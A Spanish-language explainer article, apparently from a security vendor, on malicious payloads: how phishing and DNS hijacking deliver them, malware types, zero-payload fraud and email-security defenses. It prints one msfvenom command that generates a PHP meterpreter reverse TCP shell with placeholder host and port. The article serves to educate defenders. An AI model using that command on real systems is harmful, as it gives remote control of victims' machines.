El término “carga útil” se refiere tradicionalmente a la carga que lleva un vehículo, por ejemplo, los pasajeros de un avión o la carga de un camión.
Pero, en informática, “carga útil” (payload en inglés) se refiere al contenido de un mensaje.
Cuando se envía un correo electrónico, se transmiten varios datos, como una cabecera, algunos metadatos y el propio mensaje. En este caso, el mensaje es la carga útil, es decir, el contenido que quieres que reciba el destinatario.
El término “carga útil maliciosa” o “payload maliciosa” entra en juego cuando hablamos específicamente de ciberseguridad.
Tabla de Contenido
Qué es una Payload Maliciosa
En un ciberataque, una carga útil maliciosa (payload maliciosa) es lo que el atacante quiere hacer llegar al objetivo: es el contenido que causa daño a la víctima del ataque. A menudo, es una URL que lleva a un sitio web malicioso o un archivo adjunto que despliega malware.
¿Cómo se Entrega una Payload Maliciosa?
Las payloads maliciosas primero tienen que encontrar el camino hacia el dispositivo del objetivo. ¿Cómo? Hay un par de métodos que los hackers utilizan para hacerlo.
- Ataques de ingeniería social
- Secuestro de DNS
La forma más común de entregar una payload maliciosa es a través de ataques de ingeniería social como el phishing, el spear phishing, el CEO Fraud y otros tipos de ataques avanzados de suplantación de identidad.
Así es como empieza un típico ataque de phishing…
Supongamos que tu oficina ha pedido tinta para la impresora. Recibes un correo electrónico de alguien que dice ser “FedEx” que dice: “haz clic aquí para rastrear tu pedido“. Como, de hecho, estás esperando una entrega, haces clic en el enlace.
El enlace parece llevar a la página de seguimiento de pedidos de FedEx, pero la página hace que se descargue un archivo en tu ordenador. Este archivo es el payload malicioso.
Aunque el correo electrónico es el vector de entrega más común para las payloads maliciosas, también pueden aparecer a través de ataques de vishing (por teléfono o VoIP) y smishing (por SMS).
Otra forma de entregar un payload malicioso es a través del secuestro de DNS. En este caso, el atacante obliga al navegador del objetivo a redirigirse a un sitio web donde se descargará el payload en forma de archivo de malware.
Tipos de Payloads Maliciosos
Los payloads maliciosos pueden adoptar diversas formas. Los ejemplos siguientes son todos tipos de “malware” (software malicioso).
- Virus: Un tipo de malware que puede replicarse e insertar su código en otros programas.
- Ransomware: Cifra los datos del ordenador objetivo, dejándolo inutilizable, y luego pide un rescate para restaurar el acceso.
- Spyware: Programa que rastrea la actividad del usuario en un dispositivo, incluyendo los sitios web que visita, las aplicaciones que utiliza y las teclas que pulsa (y, por tanto, las contraseñas del usuario).
- Troyano: Cualquier archivo que parece inocente, pero que realiza acciones maliciosas cuando se ejecuta.
- Adware: Secuestra el ordenador objetivo y muestra molestos anuncios emergentes, afectando al rendimiento.
Pero no es necesario que la payload venga en forma de archivo. El “malware sin archivos” utiliza la memoria del ordenador y las herramientas del sistema existentes para llevar a cabo acciones maliciosas, sin necesidad de descargar ningún archivo. El malware sin archivos es notoriamente difícil de detectar.
Payload Malicioso frente a Payload Cero
No todos los ataques de phishing se basan en una payload maliciosa. Algunos ataques simplemente persuaden a la víctima para que realice una solicitud. Sigue leyendo para ver ejemplos.
Supongamos que alguien que dice ser un proveedor habitual te envía un correo electrónico. El correo electrónico afirma que ha habido un problema con tu pago reciente.
Con un ataque de payload malicioso, el correo electrónico podría contener un archivo adjunto disfrazado de tu última factura.
Con un ataque de carga útil cero (zero payload), el correo electrónico puede animarte a iniciar una transferencia bancaria o a actualizar manualmente los datos de la cuenta para desviar el pago del proveedor genuino al hacker.
Los ataques de carga útil cero pueden ser tan devastadores como los ataques de carga útil maliciosa, y el software antivirus y antiphishing tradicional tiene dificultades para detectarlos.
Cómo se Ejecutan las Payloads
Hay un suministro interminable de payloads que los hackers pueden utilizar para infectar una máquina. Incluso se pueden generar payloads con una interfaz gráfica, por ejemplo, con el framework Metasploit.
Estas pruebas de penetración pueden generar un payload y, sobre todo, emular conexiones entrantes con la máquina infectada una vez que el hacker está dentro. A continuación, pueden interactuar con el ordenador objetivo, lo que puede consistir en realizar capturas de pantalla, interactuar con el sistema de archivos o acceder a la cámara web.
Payloads y Reverse TCP Shell
Metasploit es útil para generar una shell inversa. El siguiente comando genera una shell TCP inversa con el framework de Metasploit:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PUERTO> -f raw > shell.php
La opción -p
significa payload.
Los atacantes la utilizan para obtener el control de una máquina comprometida a través de un shell interactivo. El objetivo se convierte en el servidor, y el atacante es el cliente. Un listener permite servir un shell para acceder al ordenador de la víctima cuando ésta envía una conexión TCP.
Cómo Detener las Payloads Maliciosas
Debes tomar todas las medidas razonables para asegurarte de que las payloads maliciosas no lleguen a tus dispositivos. La seguridad del correo electrónico es un medio crucial para lograrlo.
¿Por qué? Porque el correo electrónico es el vector de amenazas que más preocupa a los responsables de seguridad y TI. También es el medio más común para los ataques de phishing y un punto de entrada clave para las payloads maliciosas.
Entonces, puedes aplicar todos los consejos esenciales de higiene de seguridad, que incluyen, por supuesto, no hacer clic a ciegas en archivos adjuntos y enlaces de correo electrónico. También debes realizar pruebas de penetración y parchear las vulnerabilidades con regularidad.
Además, mantén tus APIs seguras. Esto implica que los desarrolladores sólo utilicen tecnologías robustas que dominen, y no frameworks de moda que puedan plantear problemas de seguridad cuando estén mal configurados o no se implementen correctamente.